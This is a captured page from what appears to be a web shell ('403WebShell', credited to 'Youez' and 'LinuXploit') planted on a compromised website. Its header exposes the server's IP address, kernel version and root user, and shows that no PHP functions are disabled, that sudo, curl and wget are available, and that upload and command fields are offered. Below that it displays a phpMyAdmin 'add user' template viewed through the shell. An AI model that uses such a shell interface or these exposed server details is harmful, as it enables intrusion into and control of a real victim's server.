Warning: chmod(): Operation not permitted in /var/www/html/glamautowash.com/wp-content/plugins/translatepress-developer/index.php on line 8
403WebShell
403Webshell
Server IP : 178.128.116.179  /  Your IP : 216.73.216.206
Web Server : nginx/1.30.3
System : Linux glamautowash 6.8.0-71-generic #71-Ubuntu SMP PREEMPT_DYNAMIC Tue Jul 22 16:52:38 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.4.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/glamautowash.com/pma/templates/server/privileges/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/glamautowash.com/pma/templates/server/privileges/add_user.twig
<h2>
  {{ get_icon('b_usradd') }}
  {% trans 'Add user account' %}
</h2>

<form name="usersForm" id="addUsersForm" action="{{ url('/server/privileges') }}" method="post" autocomplete="off">
  {{ get_hidden_inputs() }}

  {{ login_information_fields_new|raw }}

  <fieldset class="pma-fieldset" id="fieldset_add_user_database">
    <legend>{% trans 'Database for user account' %}</legend>

    <input type="checkbox" name="createdb-1" id="createdb-1">
    <label for="createdb-1">{% trans 'Create database with same name and grant all privileges.' %}</label>
    <br>

    <input type="checkbox" name="createdb-2" id="createdb-2">
    <label for="createdb-2">{% trans 'Grant all privileges on wildcard name (username\\_%).' %}</label>
    <br>

    {% if database is not empty %}
      <input type="checkbox" name="createdb-3" id="createdb-3" checked>
      <label for="createdb-3">{{ 'Grant all privileges on database %s.'|trans|format(database) }}</label>
      <input type="hidden" name="dbname" value="{{ database }}">
      <br>
    {% endif %}
  </fieldset>

  {% if is_grant_user %}
    {{ privileges_table|raw }}
  {% endif %}

  <fieldset id="fieldset_add_user_footer" class="pma-fieldset tblFooters">
    <input type="hidden" name="adduser_submit" value="1">
    <input class="btn btn-primary" type="submit" id="adduser_submit" value="{% trans 'Go' %}">
  </fieldset>
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit